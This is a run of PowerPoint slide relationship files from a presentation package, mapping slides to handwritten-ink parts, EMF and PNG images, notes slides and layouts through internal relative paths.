<file path=ppt/slides/_rels/slide2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9.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1153.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1148.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1150.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image667.emf"/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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1152.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1149.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image666.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image664.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1151.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image668.emf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80.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1159.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image673.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image677.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1154.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1163.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1156.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image670.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1161.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1165.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide221.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image672.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67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70.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1158.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image676.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1155.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1160.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1164.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image678.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image669.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1162.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6660.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1157.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image671.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image675.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink116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67.xml"/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6.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1168.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image635.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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174.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image685.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image689.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1169.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1178.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image693.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1171.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image682.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1176.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1180.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1184.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide223.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image684.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image686.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11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9.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1173.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image688.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image692.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1170.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1175.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1179.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image690.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image681.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1177.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1183.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6780.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1172.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image683.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image687.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1181.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image691.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image680.emf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85.xml"/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9.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1186.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image637.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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5.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1187.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1189.xml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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1188.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image696.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6930.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1190.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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3.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1191.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1193.xml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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1192.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink132.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1194.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1196.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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7.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1195.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image699.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6960.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1197.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1203.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image706.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1198.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1200.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image703.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1205.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide228.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image705.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1202.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1199.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1204.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image702.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1206.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6990.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1201.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image704.emf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07.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide229.xml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1208.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69900.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7040.emf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09.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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4.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1215.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1210.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1212.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide231.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1214.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1211.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1216.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image709.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1213.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image712.emf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17.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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00.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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5.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1218.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1220.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image717.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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4.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1222.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1219.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image716.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4140.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1221.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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6.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1223.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1224.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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5.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image727.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1225.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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40.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1230.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image722.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1226.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1234.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1227.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image719.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1232.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide235.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image721.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72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30.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1229.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1231.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7150.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1233.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1228.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image720.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image724.emf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5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink140.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink144.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink137.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide24.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink139.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink141.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126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4.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink143.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1141.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink145.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink136.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink133.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink138.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink142.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.emf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35.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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9.emf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8.xml"/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36.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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8.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1237.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5640.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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40.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7170.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7110.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1242.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide24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39.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7160.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7080.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1241.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1238.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7120.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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45.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7230.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1250.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image731.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7200.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1247.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7280.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide241.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1249.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink125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44.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7220.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7190.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7240.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1246.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image730.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1243.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7210.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1248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52.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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2.emf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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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notesSlide" Target="../notesSlides/notesSlide244.xml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55.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image737.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1260.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image734.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1257.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image739.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide245.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink125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54.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image736.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image733.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image738.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1256.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image741.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1253.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image735.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1258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4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247.xml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60.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image745.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1261.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1263.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 